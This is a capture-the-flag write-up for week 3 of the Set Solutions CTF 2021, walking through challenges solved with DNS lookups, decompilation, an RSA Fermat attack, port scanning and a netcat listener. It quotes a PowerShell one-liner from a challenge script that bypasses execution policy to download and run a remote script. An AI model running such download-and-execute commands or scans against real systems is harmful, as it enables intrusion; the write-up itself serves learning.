Set Solutions CTF 2021 Week 3

Quick Navigation
Week 1 \ Week 2 \ Week 4

Note: Fewer challenge details were documented during week 3. The website went down shortly after the CTF ended, before I was able to thoroughly document challenge prompts and steps

To skip to detailed writeups from week 3, start reading at Captured Communication.

Save the Lizards

Note: I forgot to record the description for this challenge, however, it contained the text savethelizards.today

.today is a top-level domain, and a WHOIS lookup revealed that savethelizards.today was a registered domain. A DNS record lookup of savethelizards.today revealed a TXT entry containing the flag.

You Have Mail

Note: I forgot to record the description and many steps taken for this challenge

You Have Mail lead me to a Windows bat script which contained code to download and execute a remote PowerShell script titled ftony.ps1

PowerShell -NoProfile -NoExit -ExecutionPolicy Bypass -Command iex (New-Object Net.WebClient).DownloadString('https://ssictfstatic.s3.us-east-2.amazonaws.com/ftony.ps1')

I downloaded ftony.ps1 directly with wget and removed a significant amount of the contents, including a large try-catch block regarding a user interface. I pasted the remaining code into https://tio.run/#powershell and clicked run. The flag appeared!

Knocked off Course

Challenge description:

The Episilon satellite has been knocked off course. We can attempt some course correction maneuvers, but our odds are not good. All we’ve got to work with is a chimpanzee that flew up on a recent mission. At best, you have a 1 in 10,000 chance of getting this right.

Challenge attachments: guessNum

Knocked off Course contained a 1.8 MB Linux executable called guessNum. Prior to even executing guessNum, I ran strings guessNum, and noticed a significant amount of python references, which implied that guessNum may be a compiled python executable.

I extracted the contents of guessNum using pyinstxtractor.py1.

Next, I used uncompyle6 to decompile guessNum.pyc, one of the files extracted by pyinstxtractor.

Alternatively, Knocked off Course could have been solved by using pwntools to script interaction with guessNum, as delay between each of the ~10000 guesses would be minimal.

Captured Communication

Challenge description:

We have a Spy! We have captured a public key, and a ciphered message. Let’s catch this spy, otherwise were going to have to reformat the entire system and start over.

Challenge attachments: pub_key, cipher_text

Captured Communication provided two attachments, being pub_key and cipher_text. Note that neither of these files were newline terminated, should you decide to try the challenge yourself.

pub_key

-----BEGIN PUBLIC KEY-----
MIIBITANBgkqhkiG9w0BAQEFAAOCAQ4AMIIBCQKCAQBJfoRSZIBnKN2kwQ5KHDoK
jaYFq79T4XufRQ+taIEk/HaxbPy4R1nelT9T+bWrWOylO0IzWDaPW9Hb9pQjEVdO
LxJdKpeUUZ/xAt6o2GFV0HJrZ9PQD19KvND6yTU1H2poOzmVU5OuObaq2DD5UqoO
UGUdkPfFOU1CGwcP3rhOlTeEWEcuXwZVkJXenWhFXrGjQFbpq3zUfAQ+m7OPh0Y0
Vd6jSJorwoBeA4z3lG+XLsWIdu6uLG755l30k3vtbLLK7tMU8U7li7uCfuCaOn1U
1chbesIu7TejLx7WJHu5YNneCS1L4oC2fFSyEArfUzxPgXKrGcSviqiRaU5NNY81
AgMBAAE=
-----END PUBLIC KEY-----

cipher_text

4206fac65fce53b4f55cec7e8417724d6174e0e6d6b96da375cea9c1d3c81547a5584316d6e49d2de9f60dfe4daecae061dfc25c822950e22d30b61b6621e2c9c33c46971b6cb0e1b1764a77cf63e6e531cd0b9f24ecd242ba53f2b159be9f8572e0e0ad884946b63ac27394c952ee45ac1009be1d24a5243111f617c807f99f6907555fd258a83dd0eb7ac615caf7c741e225b84ac575727b3c39bb5361f7e08b153b362ccc0ef7e1a492c777d30246b6cc54124de0c95f8214fd45b1a35cf68849179930c595d4bb11087f2cfca0aca63435abfd5456e38cc1111e2d3a21e5e3a04d39451dbecb616802830af9251b84c6b97fbb6024e13c4d704840752d81

Utilizing openssl, I was able to determine that the public key was RSA encrypted, with the command openssl asn1parse -in pub_key.

Given that only the public key and cipher text were provided, the next logical CTF step would be to brute force the private key, using RsaCtfTool. The command python3 RsaCtfTool.py --publickey pub_key --uncipherfile cipher_text resulted in RsaCtfTool attempting multiple types of attacks on the encrypted content. After some time, RsaCtfTool attempted a fermat attack, which succeeded, and the utf-8 output of the decrypted ciphertext contained the flag.

To the Stars

Challenge description:

WeAre.ReturningTo.Space And only one way to get there…

Challenge image:

Similar to Save the Lizards , the description of To the Stars contained text that appeared to be a URL. Given that this challenge again involves public internet-facing infrastructure, I wanted to ensure that any actions I took were—with some confidence—against Set Solutions CTF endpoints. WHOIS and DNS queries of WeAre.ReturningTo.Space revealed that the domain was 31 days old and resolved to the IP address of 3.22.44.14, which belonged to an EC2 in the same region as To the Stars.

After initial port scans of 3.22.44.14 revealed nothing, I ran a full syn port scan by executing sudo nmap -p- 3.22.44.14. The full scan revealed that only a single port, 42731, was open.

A netcat connection to 3.22.44.14 42731 revealed that the EC2 instance was running OpenSSH on port 42731.

Finally, I SSH’d to 3.22.44.14 42731, and some ascii art, along with the flag, was returned in the banner.

Poison Delivery

Challenge description:

Space Force SIGINT has identified a way to intercept foreign communications. Waiting for your input commander, to provide an IP address to redirect the signal to…

The challenge page for poison delivery contained a prompt for an IP address. After trying various ways to break the input form, I realized that the challenge may take a bit more effort.

Presumably, the next steps—or the flag—would be sent to the IP address entered. This challenge is especially interesting because it is very out of the box–it requires the competitor to listen on a public IP address. In retrospect, my steps for Poison Delivery were:

  1. Spin up a basic, free EC2 instance with a public IP
  2. Allow all TCP traffic, disable the firewall and listen with tcpdump
  3. Determine the port that the challenge attempts to send data to
  4. Listen with netcat on the port discovered in step 3

Caught in the thrill of competition, I sped through each step, forgetting to document along the way. I was able to use my free AWS university account to easily spin up an EC2, which went smoothly. I allowed TCP traffic from all IP addresses to the EC2, disabled its firewall (yikes!) and listened with tcpdump. Eventually, a connection on port 38486 was logged! I setup a listener on port 38486 by executing nc -lvnp 38486.

Finally, I clicked “intercept communications” one last time, and a request came in containing the flag.

Note: you are going to have to take my word on the flag being contained in the 40 content-length of the request.

Week 3 lessons learned: Do not wait a month to document a CTF competition. The infrastructure will most likely be taken down, and all you will have left is broken RsaCtfTool installs.

Quick Navigation
Week 1 \ Week 2 \ Week 4